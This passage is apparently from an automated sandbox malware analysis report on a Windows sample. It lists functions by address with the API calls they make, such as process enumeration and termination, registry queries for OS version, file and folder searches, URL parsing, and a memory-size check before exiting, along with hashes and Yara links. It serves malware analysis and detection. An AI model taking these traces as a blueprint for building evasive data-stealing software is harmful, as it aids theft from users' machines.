                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_WGo3ga1AL9.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                                                                                                                                              • String ID: %s\%s
                                                                                                                                              • API String ID: 3896182533-4073750446
                                                                                                                                              • Opcode ID: b35235786b948e0e6555158c1c0efb0b11028fcec8c55c6120cd3185db22f78a
                                                                                                                                              • Instruction ID: 130e8712b2d17d0f4a3aa70f9b32a38deb323cc32c4c6a80807e33934adfa5f1
                                                                                                                                              • Opcode Fuzzy Hash: b35235786b948e0e6555158c1c0efb0b11028fcec8c55c6120cd3185db22f78a
                                                                                                                                              • Instruction Fuzzy Hash: 0F211B71A112189BDB24DB54DC85FE9B3B9FB48704F1081D9E609A6180DF746AC5CF98
                                                                                                                                              Function 00404800 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 60stringnetworkCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 0040483A
                                                                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404851
                                                                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404868
                                                                                                                                              • lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404889
                                                                                                                                              • InternetCrackUrlA.WININET(00000000,00000000), ref: 00404899
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2312969222.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_WGo3ga1AL9.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??2@$CrackInternetlstrlen
                                                                                                                                              • String ID: <
                                                                                                                                              • API String ID: 1683549937-4251816714
                                                                                                                                              • Opcode ID: 994daec21f0517629ae22a04d51c011e227e96814832a9a45039b376b6c0c140
                                                                                                                                              • Instruction ID: 160db8237089610cf3963e488d7c28046b69bb3d6c402c1973a99714a059ae02
                                                                                                                                              • Opcode Fuzzy Hash: 994daec21f0517629ae22a04d51c011e227e96814832a9a45039b376b6c0c140
                                                                                                                                              • Instruction Fuzzy Hash: 9F2149B1D00219ABDF14DFA5EC4AADD7B75FF04320F008229F925A7290EB706A19CF95
                                                                                                                                              Function 004199A0 Relevance: 10.6, APIs: 7, Instructions: 60processCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004199C5
                                                                                                                                              • Process32First.KERNEL32(0040A056,00000128), ref: 004199D9
                                                                                                                                              • Process32Next.KERNEL32(0040A056,00000128), ref: 004199F2
                                                                                                                                              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00419A4E
                                                                                                                                              • TerminateProcess.KERNEL32(00000000,00000000), ref: 00419A6C
                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00419A79
                                                                                                                                              • CloseHandle.KERNEL32(0040A056), ref: 00419A88
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2312969222.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_WGo3ga1AL9.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2696918072-0
                                                                                                                                              • Opcode ID: d164d69eee064959a682f4fee3bb2d75b95a0ad327ad163940014db5e985719e
                                                                                                                                              • Instruction ID: 88ad4043d03276f3ee8d31f644ab7db47d0d0c060b431017ba6a9ada5f45e9a4
                                                                                                                                              • Opcode Fuzzy Hash: d164d69eee064959a682f4fee3bb2d75b95a0ad327ad163940014db5e985719e
                                                                                                                                              • Instruction Fuzzy Hash: 06211A70900258ABDB25DFA1DC98BEEB7B9BF48304F0041C9E509A6290D7789FC4CF51
                                                                                                                                              Function 00417820 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417834
                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 0041783B
                                                                                                                                              • RegOpenKeyExA.KERNEL32(80000002,0099CBE0,00000000,00020119,00000000), ref: 0041786D
                                                                                                                                              • RegQueryValueExA.KERNEL32(00000000,009A0510,00000000,00000000,?,000000FF), ref: 0041788E
                                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00417898
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2312969222.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_WGo3ga1AL9.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                                                                              • String ID: Windows 11
                                                                                                                                              • API String ID: 3466090806-2517555085
                                                                                                                                              • Opcode ID: ece6f01e7d5fd4039499d2cf589e258aec5fff7bd7b06dda1c9cbde8cad395cd
                                                                                                                                              • Instruction ID: 90abcce2ecfc2a5b8cd512a74185dd25ab23219ddadcc09848e79f4871c60c5e
                                                                                                                                              • Opcode Fuzzy Hash: ece6f01e7d5fd4039499d2cf589e258aec5fff7bd7b06dda1c9cbde8cad395cd
                                                                                                                                              • Instruction Fuzzy Hash: FD01A274E09304BBEB00DBE4ED49FAE7779EF48700F00419AFA04A7290E7749A40CB55
                                                                                                                                              Function 004178B0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 004178C4
                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 004178CB
                                                                                                                                              • RegOpenKeyExA.KERNEL32(80000002,0099CBE0,00000000,00020119,00417849), ref: 004178EB
                                                                                                                                              • RegQueryValueExA.KERNEL32(00417849,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0041790A
                                                                                                                                              • RegCloseKey.ADVAPI32(00417849), ref: 00417914
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2312969222.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_WGo3ga1AL9.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                                                                              • String ID: CurrentBuildNumber
                                                                                                                                              • API String ID: 3466090806-1022791448
                                                                                                                                              • Opcode ID: 14ae58864b366c4003c6da9e1b5cfb2a16c067edbf69ef05e192f5cb5c601d9e
                                                                                                                                              • Instruction ID: 4c9302de3449b24d107dc6acc84b9b99571be3b3dcaa7f8b3677a924de38e7e6
                                                                                                                                              • Opcode Fuzzy Hash: 14ae58864b366c4003c6da9e1b5cfb2a16c067edbf69ef05e192f5cb5c601d9e
                                                                                                                                              • Instruction Fuzzy Hash: 51014FB5E45309BBEB00DBE4DC4AFAEB779EF44700F10459AF605A6281E774AA408B91
                                                                                                                                              Function 00414300 Relevance: 9.1, APIs: 6, Instructions: 124registrystringCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • memset.MSVCRT ref: 00414325
                                                                                                                                              • RegOpenKeyExA.KERNEL32(80000001,009A0C28,00000000,00020119,?), ref: 00414344
                                                                                                                                              • RegQueryValueExA.ADVAPI32(?,009A0768,00000000,00000000,00000000,000000FF), ref: 00414368
                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00414372
                                                                                                                                              • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 00414397
                                                                                                                                              • lstrcatA.KERNEL32(?,009A1668), ref: 004143AB
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2312969222.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_WGo3ga1AL9.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: lstrcat$CloseOpenQueryValuememset
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2623679115-0
                                                                                                                                              • Opcode ID: 5ab39f87e3c408f2a90f24169347c873da2d30c2c471e45419c7dcdc3ee26daa
                                                                                                                                              • Instruction ID: 95163f332e2e8486d22fa14c8026e7b1b291c890fe90cbe7f90fb3e747a5c624
                                                                                                                                              • Opcode Fuzzy Hash: 5ab39f87e3c408f2a90f24169347c873da2d30c2c471e45419c7dcdc3ee26daa
                                                                                                                                              • Instruction Fuzzy Hash: B641B8B6D001086BDB14EBA0EC46FEE773DAB8C300F04855EB7155A1C1EA7557888BE1
                                                                                                                                              Function 004137B0 Relevance: 9.1, APIs: 6, Instructions: 122stringCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • strtok_s.MSVCRT ref: 004137D8
                                                                                                                                                • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                                                                                                              • strtok_s.MSVCRT ref: 00413921
                                                                                                                                                • Part of subcall function 0041AB30: lstrlenA.KERNEL32(00000000,?,?,00415DA4,00420ADF,00420ADB,?,?,00416DB6,00000000,?,009996C0,?,004210F4,?,00000000), ref: 0041AB3B
                                                                                                                                                • Part of subcall function 0041AB30: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AB95
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2312969222.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_WGo3ga1AL9.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: lstrcpystrtok_s$lstrlen
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3184129880-0
                                                                                                                                              • Opcode ID: 6c6fb7d06333238994955fa4e9c6fc16004326b07765d99504ffdab069fb4719
                                                                                                                                              • Instruction ID: b6ea97cb77591b20574b5f8bad6a91ea9d9e82a59cceccb6aeafc47a8efa6348
                                                                                                                                              • Opcode Fuzzy Hash: 6c6fb7d06333238994955fa4e9c6fc16004326b07765d99504ffdab069fb4719
                                                                                                                                              • Instruction Fuzzy Hash: 9541A471E101099BCB04EFA5D945AEEB779AF44314F00801EF51677291EB78AA84CFAA
                                                                                                                                              Function 0040A110 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040A13C
                                                                                                                                              • GetFileSizeEx.KERNEL32(000000FF,?), ref: 0040A161
                                                                                                                                              • LocalAlloc.KERNEL32(00000040,?), ref: 0040A181
                                                                                                                                              • ReadFile.KERNEL32(000000FF,?,00000000,00410447,00000000), ref: 0040A1AA
                                                                                                                                              • LocalFree.KERNEL32(00410447), ref: 0040A1E0
                                                                                                                                              • CloseHandle.KERNEL32(000000FF), ref: 0040A1EA
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2312969222.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_WGo3ga1AL9.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2311089104-0
                                                                                                                                              • Opcode ID: a501a1be7f016b5cb91172ca14ff62cfed5f90a871d90683b41ae69171fc1efd
                                                                                                                                              • Instruction ID: e28607e9d9a2a96074382c0c0d30a82733061daf82e5a8752830093732aacc78
                                                                                                                                              • Opcode Fuzzy Hash: a501a1be7f016b5cb91172ca14ff62cfed5f90a871d90683b41ae69171fc1efd
                                                                                                                                              • Instruction Fuzzy Hash: 9731FC74A01209EFDB14CF94D845BEE77B5AB48304F10815AE911AB3D0D778AA91CFA6
                                                                                                                                              Function 00415190 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 70stringCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 00418F70: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418F9B
                                                                                                                                              • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 004151CA
                                                                                                                                              • lstrcatA.KERNEL32(?,00421058), ref: 004151E7
                                                                                                                                              • lstrcatA.KERNEL32(?,00999490), ref: 004151FB
                                                                                                                                              • lstrcatA.KERNEL32(?,0042105C), ref: 0041520D
                                                                                                                                                • Part of subcall function 00414B60: wsprintfA.USER32 ref: 00414B7C
                                                                                                                                                • Part of subcall function 00414B60: FindFirstFileA.KERNEL32(?,?), ref: 00414B93
                                                                                                                                                • Part of subcall function 00414B60: StrCmpCA.SHLWAPI(?,00420FC4), ref: 00414BC1
                                                                                                                                                • Part of subcall function 00414B60: StrCmpCA.SHLWAPI(?,00420FC8), ref: 00414BD7
                                                                                                                                                • Part of subcall function 00414B60: FindNextFileA.KERNEL32(000000FF,?), ref: 00414DCD
                                                                                                                                                • Part of subcall function 00414B60: FindClose.KERNEL32(000000FF), ref: 00414DE2
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2312969222.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_WGo3ga1AL9.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                                                                                                                              • String ID: cA
                                                                                                                                              • API String ID: 2667927680-2872761854
                                                                                                                                              • Opcode ID: 4a6ef23028263fd0d14b913685aa1a11d4b65358c76ef53bcbc600c4f6cc3813
                                                                                                                                              • Instruction ID: dc16e4b81abbfe3fe676fda19ddb0faac8fab1e973e0b9c2e11f24d889f851c9
                                                                                                                                              • Opcode Fuzzy Hash: 4a6ef23028263fd0d14b913685aa1a11d4b65358c76ef53bcbc600c4f6cc3813
                                                                                                                                              • Instruction Fuzzy Hash: CD21C8B6E04218A7CB14FB70EC46EED333E9B94300F40455EB656561D1EE78ABC8CB95
                                                                                                                                              Function 00401220 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0040123E
                                                                                                                                              • __aulldiv.LIBCMT ref: 00401258
                                                                                                                                              • __aulldiv.LIBCMT ref: 00401266
                                                                                                                                              • ExitProcess.KERNEL32 ref: 00401294
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2312969222.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
